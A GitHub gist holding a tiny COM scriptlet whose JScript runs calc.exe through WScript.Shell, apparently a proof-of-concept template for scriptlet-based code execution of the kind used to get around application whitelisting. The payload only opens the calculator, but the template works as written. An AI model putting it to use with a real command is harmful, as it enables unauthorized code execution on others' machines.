Last active
February 14, 2018 07:07
-
-
Save limsingrong/b80a238670f5bc1616494bba093c831b to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?XML version="1.0"?><scriptlet><registration description="" progid="x" version="1.00" classid="{00000000-0000-0000-0000-000000000000}" remotable="true"></registration><script language="JScript"><![CDATA[ | |
var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); | |
]]></script></scriptlet> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment